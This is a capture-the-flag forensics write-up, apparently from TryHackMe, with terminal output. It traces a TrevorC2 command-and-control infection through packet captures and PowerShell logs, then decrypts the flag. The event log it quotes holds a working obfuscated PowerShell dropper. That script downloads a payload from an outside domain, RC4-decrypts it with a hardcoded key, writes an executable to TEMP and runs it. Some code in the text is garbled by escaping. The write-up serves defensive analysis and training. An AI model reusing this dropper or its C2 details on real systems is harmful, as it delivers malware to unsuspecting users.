qT25wU0I0aWhVSFA4QTVtUG5qQXV2SzdaVEdUbS8wQWYxbk14ZWttTmI4ZmlPdXZkS1BGZFEzV2I5OUQ5WDJhc2RqWU1GeWtBSmYrOGd6U3dVNmlnOGtGbldsbG0zbDRBeDFjV1JUY0V1WHdDT2JOT3dKd3dha0prek9BVWc5V1J2dHVmWm82bG44ekVTRzJmRVBuUW9keTFkNjNOMnFBOFk3Tk93WTBRRjZVWWZWbVNRTXJ0cG95My9OeFJrNkNoYTNvYkxXU0F6czZJVjZGRDJaQWt2VStsK1hvckswSFdEeW9oZnBRenNLWXp1NFZzQkZjeEl4TUZhSGZOTzdtV1d6aHNIa2dIZmdIOVZmZmtxOWhqUUdUenB5OE5VblBybFFnbG1KUk53VHl1MnhKSmN2VVRhMk5rSXZBN0c4ODdaYVJEd1VlMkROOTV5OURUTloxZGRLRVZ1ZEppVDF0ajRQZXNsV21zUnFxMnJUVGpQbG4zMEgybTRyQ1liN1VmZ3RBdlBPNlNrNkpHVDFsMElDRFNUYTN5bVhJUDhWMHppKzZoRFhGNXU5eG5hMVZDN0FtUkhWcUl2OHpDV1VUR1dSa3h1Qk9XVDU1MGc3cjNoamVuSW1ENVpDTWpvRXhyUVJZVkVCR3pJdnpKa0JsVFFsTldVTzh4dDRnRDZyc0ZvWFVpNFF6b2xWb2Q1Q2JmL24vTXJNVGxqREFNb1RoUXAvd24rYjJsdHF4aTRUaWpTTFp6ZGlOQ01OcUxsalhuK0wvckNWU3ZkR0RVSmd0WG9QTGpoc3hFc0xxZGlMWW94MWNrYkJzbFV6Uk4xbHNOUG12ODFhcnFEQTRQWnVRYlNCYms1U3hjUjdFZXF1c3VhSjUwaWl1a2FrclZxN3ovbXVlTnIvK3B5UjMyUnhocUxNT3BRem93Q1ZMd0NCYm12LzhaM3BuWklCSFhPdFp4amw3U0FFZkNtSkt0bXk5TUhaUExIL3hxTWZnZFUzUkRkNTJONXREWE5oV05aZEwwdHdSN21YZEJPeVE4SE9RMmhmRlIwR1dKZ2xvckcwMEgzeUoraWE5RStqMzhWL3pQUkwvTFoxcUJ2WTlXRkpBbnlvU1E9PQ==
34.174.57.99 /
/
34.174.57.99 /
/
34.174.57.99 /images?guid=UVRNZUdTS0ozRzRaUGNlaGhLRUd0aXl2R3Zub2N2YW5UZTh3ZmorMEx1WXBPdEIvL1BSSzZ1RW5oN0EvMTIxRUJ3Z3NQZk5Yb2d0VUYxOTV0MFZ1SUZDZ1cwcnRHYzlCYlFLK1NzTWd1NVE9
/images?guid=UVRNZUdTS0ozRzRaUGNlaGhLRUd0aXl2R3Zub2N2YW5UZTh3ZmorMEx1WXBPdEIvL1BSSzZ1RW5oN0EvMTIxRUJ3Z3NQZk5Yb2d0VUYxOTV0MFZ1SUZDZ1cwcnRHYzlCYlFLK1NzTWd1NVE9
34.174.57.99 /
/
34.174.57.99 /
/
34.174.57.99 /
/
34.174.57.99 /
/
34.174.57.99 /
/
34.174.57.99 /
/
34.174.57.99 /
/
What encryption algorithm was used by the script? RC4
# Alternative: use evtx_dump
root@ip-10-82-96-17:~/attachments/dist# apt-get install -y libevtx-utils
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages were automatically installed and are no longer required:
liblttng-ust-ctl4 liblttng-ust0 libwireshark13 libwiretap10 libwsutil11 python3-wheel ruby-build ruby2.7-doc xul-ext-ubufox
Use 'apt autoremove' to remove them.
The following additional packages will be installed:
libbfio1 libevtx1
The following NEW packages will be installed
libbfio1 libevtx-utils libevtx1
0 to upgrade, 3 to newly install, 0 to remove and 251 not to upgrade.
Need to get 957 kB of archives.
After this operation, 3,161 kB of additional disk space will be used.
Get:1 http://eu-west-1.ec2.archive.ubuntu.com/ubuntu focal/universe amd64 libbfio1 amd64 20170123-5ubuntu1 [306 kB]
Get:2 http://eu-west-1.ec2.archive.ubuntu.com/ubuntu focal/universe amd64 libevtx1 amd64 20181227-1.1 [459 kB]
Get:3 http://eu-west-1.ec2.archive.ubuntu.com/ubuntu focal/universe amd64 libevtx-utils amd64 20181227-1.1 [191 kB]
Fetched 957 kB in 0s (9,516 kB/s)
Selecting previously unselected package libbfio1:amd64.
(Reading database ... 508138 files and directories currently installed.)
Preparing to unpack .../libbfio1_20170123-5ubuntu1_amd64.deb ...
Unpacking libbfio1:amd64 (20170123-5ubuntu1) ...
Selecting previously unselected package libevtx1:amd64.
Preparing to unpack .../libevtx1_20181227-1.1_amd64.deb ...
Unpacking libevtx1:amd64 (20181227-1.1) ...
Selecting previously unselected package libevtx-utils.
Preparing to unpack .../libevtx-utils_20181227-1.1_amd64.deb ...
Unpacking libevtx-utils (20181227-1.1) ...
Setting up libbfio1:amd64 (20170123-5ubuntu1) ...
Setting up libevtx1:amd64 (20181227-1.1) ...
Setting up libevtx-utils (20181227-1.1) ...
Processing triggers for man-db (2.9.1-1) ...
Processing triggers for libc-bin (2.31-0ubuntu9.16) ...
root@ip-10-82-96-17:~/attachments/dist# evtxexport Powershell-Operational.evtx > evtx_dump.txt 2>/dev/null
root@ip-10-82-96-17:~/attachments/dist# grep -iE "AES|RSA|XOR|encrypt|cipher|key|crypto" evtx_dump.txt
\(byte -bxor \)s[(\(s[\)i] + \(s[\)j]) % 256]
The line
\(byte -bxor \)s[(\(s[\)i] + \(s[\)j]) % 256]is not just plain XOR, though that's RC4. The pattern\(s[\)i]and\(s[\)j]with the modulo 256 operation is the RC4 keystream generation (KSA + PRGA algorithm).-bxoris just PowerShell's bitwise XOR operator, which RC4 uses in its final step to encrypt the data.To confirm, look at the surrounding script:
grep -A 10 -B 10 "bxor" evtx_dump.txtYou should see the full RC4 implementation key scheduling array initialization, the swap loop, and then the XOR step you already found.
RC4: That's the actual algorithm. The
-bxoris just the XOR operation that RC4 uses internally, but the full algorithm with the\(sarray,\)i,$jindices, and% 256modulo is the RC4 keystream cipher. XOR alone is too generic — RC4 is the specific encryption algorithm.
What key was used to decrypt the second-stage payload? X9vT3pL2QwE8xR6ZkYhC4s
What was the timestamp of the server response containing the payload? Fri, 10 Apr 2026 05:28:23 GMT
cat evtx_dump.txt
evtxexport 20181227
Event number : 1
Written time : Apr 10, 2026 05:28:02.222299600 UTC
Event level : Information (4)
User security identifier : S-1-5-21-753961636-1548247123-2641200033-1001
Computer name : DESKTOP-I6C5C7M
Source name : Microsoft-Windows-PowerShell
Event identifier : 0x0000a001 (40961)
Number of strings : 0
Event number : 2
Written time : Apr 10, 2026 05:28:02.405399100 UTC
Event level : Information (4)
User security identifier : S-1-5-21-753961636-1548247123-2641200033-1001
Computer name : DESKTOP-I6C5C7M
Source name : Microsoft-Windows-PowerShell
Event identifier : 0x0000d100 (53504)
Number of strings : 2
String: 1 : 4444
String: 2 : DefaultAppDomain
Event number : 3
Written time : Apr 10, 2026 05:28:03.356831600 UTC
Event level : Information (4)
User security identifier : S-1-5-21-753961636-1548247123-2641200033-1001
Computer name : DESKTOP-I6C5C7M
Source name : Microsoft-Windows-PowerShell
Event identifier : 0x0000a002 (40962)
Number of strings : 0
Event number : 4
Written time : Apr 10, 2026 05:28:03.405161500 UTC
Event level : Verbose (5)
User security identifier : S-1-5-21-753961636-1548247123-2641200033-1001
Computer name : DESKTOP-I6C5C7M
Source name : Microsoft-Windows-PowerShell
Event identifier : 0x00001008 (4104)
Number of strings : 5
String: 1 : 1
String: 2 : 1
String: 3 : prompt
String: 4 : b58dab54-1c3f-4703-89dc-ea18519d17e2
String: 5 :
Event number : 5
Written time : Apr 10, 2026 05:28:23.175635500 UTC
Event level : Verbose (5)
User security identifier : S-1-5-21-753961636-1548247123-2641200033-1001
Computer name : DESKTOP-I6C5C7M
Source name : Microsoft-Windows-PowerShell
Event identifier : 0x00001008 (4104)
Number of strings : 5
String: 1 : 1
String: 2 : 1
String: 3 : .\updates.ps1
String: 4 : cd9ab053-2906-4173-9346-813b5561a628
String: 5 :
Event number : 6
Written time : Apr 10, 2026 05:28:23.218530800 UTC
Event level : Verbose (5)
User security identifier : S-1-5-21-753961636-1548247123-2641200033-1001
Computer name : DESKTOP-I6C5C7M
Source name : Microsoft-Windows-PowerShell
Event identifier : 0x00001008 (4104)
Number of strings : 5
String: 1 : 1
String: 2 : 1
String: 3 : $k = [System.Text.Encoding]::UTF8.GetBytes(('X9vT3pL'+'2QwE'+'8xR6'+'ZkYhC4'+'s'))
$h = (New-Object System.Net.WebClient).DownloadString((-join('ht','tp','://','api-edg','e','cl','oud.xy','z/amd.bi','n'))) -replace ('\'+'s'),''
\(b = for(\)x=0; \(x -lt \)h.Length; \(x+=2) { [Convert]::ToByte(\)h.Substring($x, 2), 16) }
$s = 0..255
$j = 0
for (\(i = 0; \)i -lt 256; $i++) {
\(j = (\)j + \(s[\)i] + \(k[\)i % $k.Count]) % 256
\(temp = \)s[\(i]; \)s[\(i] = \)s[\(j]; \)s[\(j] = \)temp
}
\(i = \)j = 0
\(d = foreach (\)byte in $b) {
\(i = (\)i + 1) % 256
\(j = (\)j + \(s[\)i]) % 256
\(temp = \)s[\(i]; \)s[\(i] = \)s[\(j]; \)s[\(j] = \)temp
\(byte -bxor \)s[(\(s[\)i] + \(s[\)j]) % 256]
}
\(p = \)env:TEMP + '\amdfendrsr.exe'
[System.IO.File]::WriteAllBytes(\(p, \)d)
Start-Process $p
String: 4 : f3e51d8b-a580-40a4-ab12-4384c40ca729
String: 5 : C:\Users\jim\Downloads\updates.ps1
Event number : 7
Written time : Apr 10, 2026 05:28:23.590812900 UTC
Event level : Verbose (5)
User security identifier : S-1-5-21-753961636-1548247123-2641200033-1001
Computer name : DESKTOP-I6C5C7M
Source name : Microsoft-Windows-PowerShell
Event identifier : 0x00001008 (4104)
Number of strings : 5
String: 1 : 1
String: 2 : 1
String: 3 : prompt
String: 4 : 4ccbc8ff-078b-4ffa-a16f-81b8318bc995
String: 5 :
What is the SHA-256 hash of the extracted and decrypted payload? e3d39d42df63c6874780737244370ba517820f598fd2443e47ff6580f10c17cb
tshark -r traffic.pcapng -Y "http.response and ip.dst == $(tshark -r traffic.pcapng -Y 'http.request.uri contains "amd.bin"' -T fields -e ip.src | head -1)" --export-objects "http,./extracted" 2>/dev/null
Running as user "root" and group "root". This could be dangerous.
1675 12.148159900 34.174.85.91 \u2192 10.0.2.15 HTTP 1446 HTTP/1.0 200 OK
1685 12.610728600 34.174.57.99 \u2192 10.0.2.15 HTTP 298 HTTP/1.1 200 OK
1773 12.815133500 34.174.57.99 \u2192 10.0.2.15 HTTP 719 HTTP/1.1 200 OK (text/html)
2761 19.032387600 34.174.57.99 \u2192 10.0.2.15 HTTP 719 HTTP/1.1 200 OK (text/html)
2866 27.233389300 34.174.57.99 \u2192 10.0.2.15 HTTP 719 HTTP/1.1 200 OK (text/html)
2970 34.462369600 34.174.57.99 \u2192 10.0.2.15 HTTP 719 HTTP/1.1 200 OK (text/html)
3139 42.662874300 34.174.57.99 \u2192 10.0.2.15 HTTP 739 HTTP/1.1 200 OK (text/html)
3156 42.897708700 34.174.57.99 \u2192 10.0.2.15 HTTP 251 HTTP/1.1 200 OK
3244 47.092506700 34.174.57.99 \u2192 10.0.2.15 HTTP 719 HTTP/1.1 200 OK (text/html)
3331 55.314458600 34.174.57.99 \u2192 10.0.2.15 HTTP 719 HTTP/1.1 200 OK (text/html)
3427 59.557171300 34.174.57.99 \u2192 10.0.2.15 HTTP 763 HTTP/1.1 200 OK (text/html)
3438 59.688346400 34.174.57.99 \u2192 10.0.2.15 HTTP 251 HTTP/1.1 200 OK
3528 66.890340700 34.174.57.99 \u2192 10.0.2.15 HTTP 719 HTTP/1.1 200 OK (text/html)
3695 74.091819000 34.174.57.99 \u2192 10.0.2.15 HTTP 803 HTTP/1.1 200 OK (text/html)
3705 74.197427900 34.174.57.99 \u2192 10.0.2.15 HTTP 251 HTTP/1.1 200 OK
3793 78.420214300 34.174.57.99 \u2192 10.0.2.15 HTTP 699 HTTP/1.1 200 OK (text/html)
3885 83.636218800 34.174.57.99 \u2192 10.0.2.15 HTTP 719 HTTP/1.1 200 OK (text/html)
3970 89.830973600 34.174.57.99 \u2192 10.0.2.15 HTTP 719 HTTP/1.1 200 OK (text/html)
4058 92.034540300 34.174.57.99 \u2192 10.0.2.15 HTTP 719 HTTP/1.1 200 OK (text/html)
4150 95.266197400 34.174.57.99 \u2192 10.0.2.15 HTTP 719 HTTP/1.1 200 OK (text/html)
4240 100.465999500 34.174.57.99 \u2192 10.0.2.15 HTTP 719 HTTP/1.1 200 OK (text/html)
4336 104.656729400 34.174.57.99 \u2192 10.0.2.15 HTTP 719 HTTP/1.1 200 OK (text/html)
root@ip-10-82-96-17:~/attachments/dist# ls extracted/
%2f '%2f(10)' '%2f(12)' '%2f(14)' '%2f(16)' '%2f(3)' '%2f(5)' '%2f(7)' '%2f(9)'
'%2f(1)' '%2f(11)' '%2f(13)' '%2f(15)' '%2f(2)' '%2f(4)' '%2f(6)' '%2f(8)' amd.bin
root@ip-10-82-96-17:~/attachments/dist# python3 - <<'EOF'
> key = b'X9vT3pL2QwE8xR6ZkYhC4s'
>
> with open('extracted/amd.bin', 'r') as f:
> hex_data = f.read().replace('\n','').replace('\r','').replace(' ','')
>
> b = bytes.fromhex(hex_data)
>
> s = list(range(256))
> j = 0
> for i in range(256):
> j = (j + s[i] + key[i % len(key)]) % 256
> s[i], s[j] = s[j], s[i]
>
> i = j = 0
> d = []
> for byte in b:
> i = (i + 1) % 256
> j = (j + s[i]) % 256
> s[i], s[j] = s[j], s[i]
> d.append(byte ^ s[(s[i] + s[j]) % 256])
>
> with open('decrypted.exe', 'wb') as f:
> f.write(bytes(d))
> print("Decrypted successfully")
> EOF
Decrypted successfully
root@ip-10-82-96-17:~/attachments/dist#
root@ip-10-82-96-17:~/attachments/dist# sha256sum decrypted.exe
e3d39d42df63c6874780737244370ba517820f598fd2443e47ff6580f10c17cb decrypted.exe
file decrypted.exe
decrypted.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
What remote URL did the client use to communicate with the victim machine? http://34.174.57.99
tshark -r traffic.pcapng -Y "ip.dst == 34.174.57.99 and http.request" -T fields -e http.request.full_uri | head -5
Running as user "root" and group "root". This could be dangerous.
http://34.174.57.99/images?guid=c09Gc3pZOGRaOGF6MWo4bUNKM0tGUktFK2t2b3dOOEtQR2hhWUF0VVlhcUdwWjl4RGJHNXR1UnkyRzdOTXptdQ==
http://34.174.57.99/
http://34.174.57.99/
http://34.174.57.99/
http://34.174.57.99/
Which encryption key and algorithm does the client use? M4squ3r4d3Th3P4ck3tSt34lthM0d31337, AES
strings -e l decrypted.exe | grep -vE "System|Windows|Microsoft|http|DESKTOP|Program|xmlns|assembly|requestedPrivileges"
-z/z3z_
M4squ3r4d3Th3P4ck3tSt34lthM0d31337
magic_hostname={0}
Accept-Encoding
identity
[*] Cannot connect to {0}
[*] Trying again in {0} seconds...
<!-- {0}
oldcss=
--></body>
nothing
::::
cmd.exe
/Q /c {0} 2>&1
/images
guid=
oldcss=
M4squ3r4d3Th3P4ck3tSt34lthM0d31337
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
0.0.0.0
InternalName
LegalCopyright
OriginalFilename
ProductVersion
0.0.0.0
Assembly Version
0.0.0.0
After determining the client's encryption, decrypt the commands the attacker executed on the victim and submit the flag.
M4squ3r4d3Th3P4ck3tSt34lthM0d31337: b5f253f95311e41930daa10fc6ca5823a404df428c45dd5b350fccf36a20e846
from the pcapng file at the top we have this
34.174.57.99 /images?guid=UVRNZUdTS0ozRzRaUGNlaGhLRUd0aXl2R3Zub2N2YW5UZTh3ZmorMEx1WXBPdEIvL1BSSzZ1RW5oN0EvMTIxRUJ3Z3NQZk5Yb2d0VUYxOTV0MFZ1SUZDZ1cwcnRHYzlCYlFLK1NzTWd1NVE9
/images?guid=UVRNZUdTS0ozRzRaUGNlaGhLRUd0aXl2R3Zub2N2YW5UZTh3ZmorMEx1WXBPdEIvL1BSSzZ1RW5oN0EvMTIxRUJ3Z3NQZk5Yb2d0VUYxOTV0MFZ1SUZDZ1cwcnRHYzlCYlFLK1NzTWd1NVE9
34.174.57.99 /
UVRNZUdTS0ozRzRaUGNlaGhLRUd0aXl2R3Zub2N2YW5UZTh3ZmorMEx1WXBPdEIvL1BSSzZ1RW5oN0EvMTIxRUJ3Z3NQZk5Yb2d0VUYxOTV0MFZ1SUZDZ1cwcnRHYzlCYlFLK1NzTWd1NVE9
FROM BASE64 → FROM BASE64 → TO HEX
41331e192289dc6e193dc7a184a106b62caf1af9e872f6a74def307e3fb42ee6293ad07ffcf44aeae12787b03fd76d4407082c3df357a20b54175f79b7456e2050a05b4aed19cf416d02be4ac320bb94
Final combination: AES Decrypt
2caf1af9e872f6a74def307e3fb42ee6293ad07ffcf44aeae12787b03fd76d4407082c3df357a20b54175f79b7456e2050a05b4aed19cf416d02be4ac320bb94
key:
b5f253f95311e41930daa10fc6ca5823a404df428c45dd5b350fccf36a20e846IV:
41331e192289dc6e193dc7a184a106b6- HexMode: CBC
Input: Hex
Output: Raw
Conclusion
This challenge demonstrated a full covert command-and-control (C2) attack chain, from initial dropper delivery through to exfiltrated data hidden in plain sight across three layers of investigation.
Network layer — tshark filtering revealed suspicious HTTP traffic to api-edgecloud.xyz and repeated beaconing to 34.174.57.99 via /images?guid= URIs. The long Base64-encoded query parameters were the first hint that data was being tunneled over what looked like normal image requests.
Host layer — The PowerShell Operational event log (Event ID 4104) exposed the dropper script updates.ps1, which downloaded amd.bin from api-edgecloud.xyz, decrypted it using RC4 with hardcoded key X9vT3pL2QwE8xR6ZkYhC4s, wrote the result to %TEMP%\amdfendrsr.exe, and executed it.
Payload layer — Stripping strings from the decrypted PE identified it as a TrevorC2 client — an open-source C2 framework that hides commands and responses inside HTML comments, making traffic blend in with legitimate web responses.
Extracting the flag — With TrevorC2 identified, focus shifted to the shortest /images?guid= parameter in the pcap, which was likely carrying command output rather than a long beacon payload. Decoding it in CyberChef via From Base64 → From Base64 → To Hex split the blob into two components:
IV (first 16 bytes):
41331e192289dc6e193dc7a184a106b6Ciphertext:
2caf1af9e872f6a74def307e3fb42ee6293ad07ffcf44aeae12787b03fd76d4407082c3df357a20b54175f79b7456e2050a05b4aed19cf416d02be4ac320bb94
The AES key was derived by SHA256-hashing the hardcoded string M4squ3r4d3Th3P4ck3tSt34lthM0d31337 found in the binary strings output, producing:
b5f253f95311e41930daa10fc6ca5823a404df428c45dd5b350fccf36a20e846
The final CyberChef operation — AES Decrypt with the key and IV above, Mode CBC, Input Hex, Output Raw — decrypted the payload to:
DESKTOP-I6C5C7M::::THM{m45k3d_tr4ff1c_0v3r_c0v3rt_ch4nn3lz}
The :::: delimiter is TrevorC2's characteristic output format, prefixing responses with the victim machine name before the command result. The flag was exfiltrated command output, hidden inside what appeared to be a routine image request.
Flag: THM{m45k3d_tr4ff1c_0v3r_c0v3rt_ch4nn3lz}
Key takeaways:
Long Base64 query parameters in image URIs should raise immediate suspicion — they are a common covert channel technique.
PowerShell Script Block Logging (Event ID 4104) is invaluable for recovering attacker code even when the original script file is deleted.
Recognising the RC4 pattern in PowerShell (
$sarray +% 256+-bxor) is a reliable indicator of encrypted dropper payloads.Knowing common C2 frameworks by their binary strings and traffic patterns (TrevorC2's HTML comment wrapping,
::::delimiter) significantly accelerates triage.
CWE references: CWE-311 (Missing Encryption of Sensitive Data), CWE-506 (Embedded Malicious Code), CWE-319 (Cleartext Transmission of Sensitive Information).
